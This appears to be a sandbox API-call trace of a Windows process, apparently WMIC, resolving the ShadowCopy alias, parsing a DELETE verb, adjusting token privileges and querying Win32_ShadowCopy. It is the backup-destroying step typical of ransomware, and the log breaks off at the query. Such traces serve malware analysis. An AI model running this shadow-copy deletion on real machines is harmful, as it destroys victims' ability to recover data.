	[0040.729] IWbemClassObject:Get (in: This=0x2109c0, wszName="User", lFlags=0, pVal=0x1bf590*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3296c8, varVal2=0x13c910), pType=0x0, plFlavor=0x0 | out: pVal=0x1bf590*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3296c8, varVal2=0x13c910), pType=0x0, plFlavor=0x0) returned 0x0
	[0040.729] free (_Block=0x13c8b0) 
	[0040.729] malloc (_Size=0x18) returned 0x13c8b0
	[0040.729] IWbemClassObject:Get (in: This=0x2109c0, wszName="Password", lFlags=0, pVal=0x1bf590*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3296c8, varVal2=0x13c910), pType=0x0, plFlavor=0x0 | out: pVal=0x1bf590*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3296c8, varVal2=0x13c910), pType=0x0, plFlavor=0x0) returned 0x0
	[0040.729] free (_Block=0x13c8b0) 
	[0040.729] malloc (_Size=0x18) returned 0x13c8b0
	[0040.729] IWbemClassObject:Get (in: This=0x2109c0, wszName="Server", lFlags=0, pVal=0x1bf590*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3296c8, varVal2=0x13c910), pType=0x0, plFlavor=0x0 | out: pVal=0x1bf590*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x13c910), pType=0x0, plFlavor=0x0) returned 0x0
	[0040.729] free (_Block=0x13c8b0) 
	[0040.729] lstrlenW (lpString=".") returned 1
	[0040.729] malloc (_Size=0x4) returned 0x136e00
	[0040.729] lstrlenW (lpString=".") returned 1
	[0040.729] malloc (_Size=0x18) returned 0x13c8b0
	[0040.730] IWbemClassObject:Get (in: This=0x2109c0, wszName="Authority", lFlags=0, pVal=0x1bf590*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3296c8, varVal2=0x13c910), pType=0x0, plFlavor=0x0 | out: pVal=0x1bf590*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3296c8, varVal2=0x13c910), pType=0x0, plFlavor=0x0) returned 0x0
	[0040.730] free (_Block=0x13c8b0) 
	[0040.730] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0040.730] IUnknown:Release (This=0x2109c0) returned 0x1
	[0040.730] GetCurrentThreadId () returned 0x9d4
	[0040.730] ??0CHString@@QEAA@XZ () returned 0x1bf568
	[0040.730] malloc (_Size=0x18) returned 0x13c8b0
	[0040.730] IWbemClassObject:Get (in: This=0x2104e0, wszName="__RELPATH", lFlags=0, pVal=0x1bf590*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3296c8, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x1bf590*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0
	[0040.730] free (_Block=0x13c8b0) 
	[0040.730] malloc (_Size=0x18) returned 0x13c8b0
	[0040.730] GetCurrentThreadId () returned 0x9d4
	[0040.730] ??0CHString@@QEAA@XZ () returned 0x1bf3e8
	[0040.730] ??0CHString@@QEAA@PEBG@Z () returned 0x1bf400
	[0040.731] ??0CHString@@QEAA@AEBV0@@Z () returned 0x1bf390
	[0040.731] ?Empty@CHString@@QEAAXXZ () returned 0x7fef875482c
	[0040.731] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x13cac0
	[0040.731] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b
	[0040.731] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1bf350
	[0040.736] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1bf398
	[0040.736] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1bf400
	[0040.776] ??1CHString@@QEAA@XZ () returned 0x7d3bd101
	[0040.776] ??1CHString@@QEAA@XZ () returned 0x7d3bd101
	[0040.776] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1bf358
	[0040.776] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1bf390
	[0040.782] ??1CHString@@QEAA@XZ () returned 0x1
	[0040.783] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x13cb30
	[0040.783] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa
	[0040.783] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x1bf350
	[0040.783] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x1bf398
	[0040.783] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1bf400
	[0040.783] ??1CHString@@QEAA@XZ () returned 0x7d3bd101
	[0040.783] ??1CHString@@QEAA@XZ () returned 0x7d3bd101
	[0040.783] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x1bf358
	[0040.783] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x1bf390
	[0040.783] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0040.790] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef8754820
	[0040.790] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0040.790] malloc (_Size=0x18) returned 0x13c8d0
	[0040.790] malloc (_Size=0x18) returned 0x13c930
	[0040.790] malloc (_Size=0x18) returned 0x13c950
	[0040.790] malloc (_Size=0x18) returned 0x13c970
	[0040.790] malloc (_Size=0x18) returned 0x13c990
	[0040.790] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c
	[0040.790] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17
	[0040.790] malloc (_Size=0x18) returned 0x13c9b0
	[0040.790] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53
	[0040.790] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29
	[0040.793] malloc (_Size=0x18) returned 0x13c9d0
	[0040.793] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c
	[0040.793] SysStringLen (param_1="\"") returned 0x1
	[0040.793] free (_Block=0x13c9b0) 
	[0040.793] free (_Block=0x13c990) 
	[0040.793] free (_Block=0x13c970) 
	[0040.793] free (_Block=0x13c950) 
	[0040.793] free (_Block=0x13c930) 
	[0040.793] free (_Block=0x13c8d0) 
	[0040.793] IWbemServices:GetObject (in: This=0x203b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x1bf3d8*=0x0, ppCallResult=0x0 | out: ppObject=0x1bf3d8*=0x210a50, ppCallResult=0x0) returned 0x0
	[0040.821] malloc (_Size=0x18) returned 0x13c8d0
	[0040.821] IWbemClassObject:Get (in: This=0x210a50, wszName="Text", lFlags=0, pVal=0x1bf410*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff702ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x1bf410*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x328c10*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2addf0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0
	[0040.821] free (_Block=0x13c8d0) 
	[0040.821] SafeArrayGetLBound (in: psa=0x328c10, nDim=0x1, plLbound=0x1bf3f0 | out: plLbound=0x1bf3f0) returned 0x0
	[0040.821] SafeArrayGetUBound (in: psa=0x328c10, nDim=0x1, plUbound=0x1bf3e0 | out: plUbound=0x1bf3e0) returned 0x0
	[0040.821] SafeArrayGetElement (in: psa=0x328c10, rgIndices=0x1bf3d4, pv=0x1bf428 | out: pv=0x1bf428) returned 0x0
	[0040.821] malloc (_Size=0x18) returned 0x13c8d0
	[0040.821] malloc (_Size=0x18) returned 0x13c930
	[0040.821] SysStringLen (param_1="Shadow copy management.") returned 0x17
	[0040.821] free (_Block=0x13c8d0) 
	[0040.821] IUnknown:Release (This=0x210a50) returned 0x0
	[0040.821] free (_Block=0x13c9d0) 
	[0040.821] ??1CHString@@QEAA@XZ () returned 0x7d3bd101
	[0040.821] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0040.821] free (_Block=0x13c8b0) 
	[0040.821] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0040.822] lstrlenW (lpString="Shadow copy management.") returned 23
	[0040.822] malloc (_Size=0x30) returned 0x138600
	[0040.822] lstrlenW (lpString="Shadow copy management.") returned 23
	[0040.822] free (_Block=0x13c930) 
	[0040.822] IUnknown:Release (This=0x2104e0) returned 0x0
	[0040.822] free (_Block=0x13c8f0) 
	[0040.822] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0040.822] lstrlenW (lpString="PATH") returned 4
	[0040.822] lstrlenW (lpString="DELETE") returned 6
	[0040.822] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1
	[0040.822] lstrlenW (lpString="WHERE") returned 5
	[0040.822] lstrlenW (lpString="DELETE") returned 6
	[0040.822] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1
	[0040.822] lstrlenW (lpString="(") returned 1
	[0040.822] lstrlenW (lpString="DELETE") returned 6
	[0040.822] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="(", cchCount2=1) returned 3
	[0040.822] lstrlenW (lpString="/") returned 1
	[0040.822] lstrlenW (lpString="DELETE") returned 6
	[0040.822] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3
	[0040.822] lstrlenW (lpString="-") returned 1
	[0040.822] lstrlenW (lpString="DELETE") returned 6
	[0040.822] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3
	[0040.822] malloc (_Size=0x18) returned 0x13c8f0
	[0040.822] lstrlenW (lpString="GET") returned 3
	[0040.822] lstrlenW (lpString="DELETE") returned 6
	[0040.822] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1
	[0040.822] lstrlenW (lpString="LIST") returned 4
	[0040.822] lstrlenW (lpString="DELETE") returned 6
	[0040.823] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1
	[0040.823] lstrlenW (lpString="SET") returned 3
	[0040.823] lstrlenW (lpString="DELETE") returned 6
	[0040.823] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1
	[0040.823] lstrlenW (lpString="CREATE") returned 6
	[0040.823] lstrlenW (lpString="DELETE") returned 6
	[0040.823] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3
	[0040.823] lstrlenW (lpString="CALL") returned 4
	[0040.823] lstrlenW (lpString="DELETE") returned 6
	[0040.823] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3
	[0040.823] lstrlenW (lpString="ASSOC") returned 5
	[0040.823] lstrlenW (lpString="DELETE") returned 6
	[0040.823] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3
	[0040.823] lstrlenW (lpString="DELETE") returned 6
	[0040.823] lstrlenW (lpString="DELETE") returned 6
	[0040.823] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2
	[0040.823] free (_Block=0x13c8f0) 
	[0040.823] lstrlenW (lpString="/") returned 1
	[0040.823] lstrlenW (lpString="DELETE") returned 6
	[0040.823] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="/", cchCount2=1) returned 3
	[0040.823] lstrlenW (lpString="-") returned 1
	[0040.823] lstrlenW (lpString="DELETE") returned 6
	[0040.823] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="-", cchCount2=1) returned 3
	[0040.823] lstrlenW (lpString="DELETE") returned 6
	[0040.823] malloc (_Size=0xe) returned 0x13c8f0
	[0040.823] lstrlenW (lpString="DELETE") returned 6
	[0040.823] lstrlenW (lpString="GET") returned 3
	[0040.823] lstrlenW (lpString="DELETE") returned 6
	[0040.823] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1
	[0040.823] lstrlenW (lpString="LIST") returned 4
	[0040.823] lstrlenW (lpString="DELETE") returned 6
	[0040.823] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1
	[0040.824] lstrlenW (lpString="SET") returned 3
	[0040.824] lstrlenW (lpString="DELETE") returned 6
	[0040.824] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1
	[0040.824] lstrlenW (lpString="CREATE") returned 6
	[0040.824] lstrlenW (lpString="DELETE") returned 6
	[0040.824] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3
	[0040.824] lstrlenW (lpString="CALL") returned 4
	[0040.824] lstrlenW (lpString="DELETE") returned 6
	[0040.824] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3
	[0040.824] lstrlenW (lpString="ASSOC") returned 5
	[0040.824] lstrlenW (lpString="DELETE") returned 6
	[0040.824] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3
	[0040.824] lstrlenW (lpString="DELETE") returned 6
	[0040.824] lstrlenW (lpString="DELETE") returned 6
	[0040.824] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2
	[0040.824] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30
	[0040.939] malloc (_Size=0x3e) returned 0x13cac0
	[0040.988] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30
	[0040.988] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select"
	[0040.988] malloc (_Size=0x18) returned 0x13c930
	[0040.988] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*"
	[0040.988] lstrlenW (lpString="FROM") returned 4
	[0040.988] lstrlenW (lpString="*") returned 1
	[0040.988] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
	[0040.988] malloc (_Size=0x18) returned 0x13c8b0
	[0040.989] free (_Block=0x13c930) 
	[0040.989] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50003a00780008 | out: _String=0x0, _Context=0x50003a00780008) returned="from"
	[0040.989] lstrlenW (lpString="FROM") returned 4
	[0040.989] lstrlenW (lpString="from") returned 4
	[0040.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
	[0040.989] malloc (_Size=0x18) returned 0x13c930
	[0040.989] free (_Block=0x13c8b0) 
	[0040.989] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50003b00780008 | out: _String=0x0, _Context=0x50003b00780008) returned="Win32_ShadowCopy"
	[0040.989] malloc (_Size=0x18) returned 0x13c8b0
	[0040.989] free (_Block=0x13c930) 
	[0040.989] free (_Block=0x13cac0) 
	[0040.989] free (_Block=0x13c8b0) 
	[0040.989] lstrlenW (lpString="SET") returned 3
	[0040.989] lstrlenW (lpString="DELETE") returned 6
	[0040.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1
	[0040.989] lstrlenW (lpString="CREATE") returned 6
	[0040.989] lstrlenW (lpString="DELETE") returned 6
	[0040.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3
	[0040.989] free (_Block=0x13c7f0) 
	[0040.989] malloc (_Size=0x8) returned 0x13cac0
	[0040.989] lstrlenW (lpString="GET") returned 3
	[0040.989] lstrlenW (lpString="DELETE") returned 6
	[0040.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1
	[0040.989] lstrlenW (lpString="LIST") returned 4
	[0040.989] lstrlenW (lpString="DELETE") returned 6
	[0040.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1
	[0040.989] lstrlenW (lpString="ASSOC") returned 5
	[0040.989] lstrlenW (lpString="DELETE") returned 6
	[0040.989] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3
	[0040.989] WbemLocator:IUnknown:AddRef (This=0x1f1390) returned 0x3
	[0040.990] free (_Block=0x38dfb0) 
	[0040.990] lstrlenW (lpString="") returned 0
	[0040.990] lstrlenW (lpString="XDUWTFONO") returned 9
	[0040.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3
	[0040.990] lstrlenW (lpString="XDUWTFONO") returned 9
	[0040.990] malloc (_Size=0x14) returned 0x13c7f0
	[0040.990] lstrlenW (lpString="XDUWTFONO") returned 9
	[0040.990] GetCurrentThreadId () returned 0x9d4
	[0040.990] GetCurrentProcess () returned 0xffffffffffffffff
	[0040.990] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1bf7b0 | out: TokenHandle=0x1bf7b0*=0x254) returned 1
	[0040.990] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1bf7a8 | out: TokenInformation=0x0, ReturnLength=0x1bf7a8) returned 0
	[0040.990] malloc (_Size=0x118) returned 0x13cae0
	[0040.990] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x3, TokenInformation=0x13cae0, TokenInformationLength=0x118, ReturnLength=0x1bf7a8 | out: TokenInformation=0x13cae0, ReturnLength=0x1bf7a8) returned 1
	[0040.990] AdjustTokenPrivileges (in: TokenHandle=0x254, DisableAllPrivileges=0, NewState=0x13cae0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1127994006, Attributes=0xf925), (Luid.LowPart=0x0, Luid.HighPart=3727280, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=939524923, Attributes=0xf932), (Luid.LowPart=0x0, Luid.HighPart=1245528, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0040.990] free (_Block=0x13cae0) 
	[0040.990] CloseHandle (hObject=0x254) returned 1
	[0040.990] lstrlenW (lpString="GET") returned 3
	[0040.990] lstrlenW (lpString="DELETE") returned 6
	[0040.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="GET", cchCount2=3) returned 1
	[0040.990] lstrlenW (lpString="LIST") returned 4
	[0040.990] lstrlenW (lpString="DELETE") returned 6
	[0040.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1
	[0040.990] lstrlenW (lpString="SET") returned 3
	[0040.990] lstrlenW (lpString="DELETE") returned 6
	[0040.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="SET", cchCount2=3) returned 1
	[0040.990] lstrlenW (lpString="CALL") returned 4
	[0040.990] lstrlenW (lpString="DELETE") returned 6
	[0040.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3
	[0040.990] lstrlenW (lpString="ASSOC") returned 5
	[0040.990] lstrlenW (lpString="DELETE") returned 6
	[0040.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3
	[0040.991] lstrlenW (lpString="CREATE") returned 6
	[0040.991] lstrlenW (lpString="DELETE") returned 6
	[0040.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3
	[0040.991] lstrlenW (lpString="DELETE") returned 6
	[0040.991] lstrlenW (lpString="DELETE") returned 6
	[0040.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2
	[0040.992] malloc (_Size=0x18) returned 0x13c8b0
	[0040.992] lstrlenA (lpString="") returned 0
	[0040.992] malloc (_Size=0x2) returned 0x38dfb0
	[0040.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff69314c, cbMultiByte=-1, lpWideCharStr=0x38dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0040.992] free (_Block=0x38dfb0) 
	[0040.992] malloc (_Size=0x18) returned 0x13c930
	[0040.992] lstrlenA (lpString="") returned 0
	[0040.992] malloc (_Size=0x2) returned 0x38dfb0
	[0040.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff69314c, cbMultiByte=-1, lpWideCharStr=0x38dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0040.992] free (_Block=0x38dfb0) 
	[0040.992] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30
	[0040.992] malloc (_Size=0x3e) returned 0x13cae0
	[0040.992] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30
	[0040.992] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff60 | out: _String="Select", _Context=0xffffffffffffff60) returned="Select"
	[0040.992] malloc (_Size=0x18) returned 0x13c9d0
	[0040.993] free (_Block=0x13c930) 
	[0040.993] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50003f00680007 | out: _String=0x0, _Context=0x50003f00680007) returned="*"
	[0040.993] lstrlenW (lpString="FROM") returned 4
	[0040.993] lstrlenW (lpString="*") returned 1
	[0040.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
	[0040.993] malloc (_Size=0x18) returned 0x13c930
	[0040.993] free (_Block=0x13c9d0) 
	[0040.993] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50004000680007 | out: _String=0x0, _Context=0x50004000680007) returned="from"
	[0040.993] lstrlenW (lpString="FROM") returned 4
	[0040.993] lstrlenW (lpString="from") returned 4
	[0040.993] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
	[0040.993] malloc (_Size=0x18) returned 0x13c9d0
	[0040.993] free (_Block=0x13c930) 
	[0040.993] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x50004100680007 | out: _String=0x0, _Context=0x50004100680007) returned="Win32_ShadowCopy"
	[0040.993] malloc (_Size=0x18) returned 0x13c930
	[0040.993] free (_Block=0x13c9d0) 
	[0040.993] free (_Block=0x13cae0) 
	[0040.993] malloc (_Size=0x18) returned 0x13c9d0
	[0040.993] malloc (_Size=0x18) returned 0x13c8d0
	[0040.993] SysStringLen (param_1="SELECT * FROM ") returned 0xe
	[0040.993] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10
	[0040.993] free (_Block=0x13c8b0) 
	[0040.993] free (_Block=0x13c9d0) 
	[0040.993] ??0CHString@@QEAA@XZ () returned 0x1bf720
	[0040.993] GetCurrentThreadId () returned 0x9d4
	[0040.993] malloc (_Size=0x18) returned 0x13c9d0
	[0040.994] malloc (_Size=0x18) returned 0x13c8b0
	[0040.994] malloc (_Size=0x18) returned 0x13c950
	[0040.994] malloc (_Size=0x18) returned 0x13c970
	[0040.994] malloc (_Size=0x18) returned 0x13c990
	[0040.994] SysStringLen (param_1="\\\\") returned 0x2
	[0040.994] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0040.994] malloc (_Size=0x18) returned 0x13c9b0
	[0040.994] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb
	[0040.994] SysStringLen (param_1="\\") returned 0x1
	[0040.994] malloc (_Size=0x18) returned 0x13c9f0
	[0040.994] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc
	[0040.994] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa
	[0040.994] free (_Block=0x13c9b0) 
	[0040.994] free (_Block=0x13c990) 
	[0040.994] free (_Block=0x13c970) 
	[0040.994] free (_Block=0x13c950) 
	[0040.994] free (_Block=0x13c8b0) 
	[0040.994] free (_Block=0x13c9d0) 
	[0040.994] malloc (_Size=0x18) returned 0x13c9d0
	[0040.994] malloc (_Size=0x18) returned 0x13c8b0
	[0040.994] malloc (_Size=0x18) returned 0x13c950
	[0040.995] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xff7029d0 | out: ppNamespace=0xff7029d0*=0x203c18) returned 0x0
	[0041.002] free (_Block=0x13c950) 
	[0041.002] free (_Block=0x13c8b0) 
	[0041.002] free (_Block=0x13c9d0) 
	[0041.002] CoSetProxyBlanket (pProxy=0x203c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
	[0041.002] free (_Block=0x13c9f0) 
	[0041.002] ??1CHString@@QEAA@XZ () returned 0x7fef875482c
	[0041.002] ??0CHString@@QEAA@XZ () returned 0x1bf670
	[0041.003] GetCurrentThreadId () returned 0x9d4
	[0041.003] malloc (_Size=0x18) returned 0x13c9f0
	[0041.003] lstrlenA (lpString="") returned 0
	[0041.003] malloc (_Size=0x2) returned 0x38dfb0
	[0041.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff69314c, cbMultiByte=-1, lpWideCharStr=0x38dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0041.003] free (_Block=0x38dfb0) 
	[0041.003] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e
	[0041.003] SysStringLen (param_1="") returned 0x0
	[0041.003] free (_Block=0x13c9f0) 
	[0041.003] malloc (_Size=0x18) returned 0x13c9f0
	[0041.003] IWbemServices:ExecQuery (in: This=0x203c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x1bf678 | out: ppEnum=0x1bf678*=0x203d18) returned 0x0
